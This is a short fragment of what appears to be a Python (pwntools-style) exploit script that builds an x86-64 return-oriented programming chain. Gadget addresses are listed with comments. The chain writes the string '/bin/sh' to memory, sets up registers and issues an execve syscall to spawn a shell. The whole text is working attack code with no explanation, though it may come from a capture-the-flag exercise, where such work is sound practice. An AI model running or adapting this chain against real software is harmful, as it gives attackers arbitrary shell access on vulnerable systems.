payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x440070)+p64(0x406511)
# 0x0000000000406511: pop rbx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4240c3)
# 0x00000000004240c3: mov qword ptr [rbp], rbx; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4062b5)
# 0x00000000004062b5: pop rsi; ret; 
payload += p64(0x0)+p64(0x405ad6)
# 0x0000000000405ad6: pop r13; ret; 
payload += p64(0x406d05)+p64(0x40d5cf)
# 0x40d5cf: mov edi, dword ptr [rsp + 8] ; sub rdx, rsi ; call r13
payload += b''
# 0x0000000000406d05: pop rbx; pop rbp; pop r12; pop r13; ret; 
payload += p64(0x0)+p64(0x440070)+p64(0x0)+p64(0x405c30)
# 0x0000000000405c30: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40e57b)
# 0x000000000040e57b: pop rdx; mov rax, rbx; add rsp, 8; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x424303)
# 0x0000000000424303: mov eax, 0x3b; pop rbx; ret; 
payload += p64(0x0)+p64(0x40cf5d)
# 0x000000000040cf5d: syscall; 
payload += b''
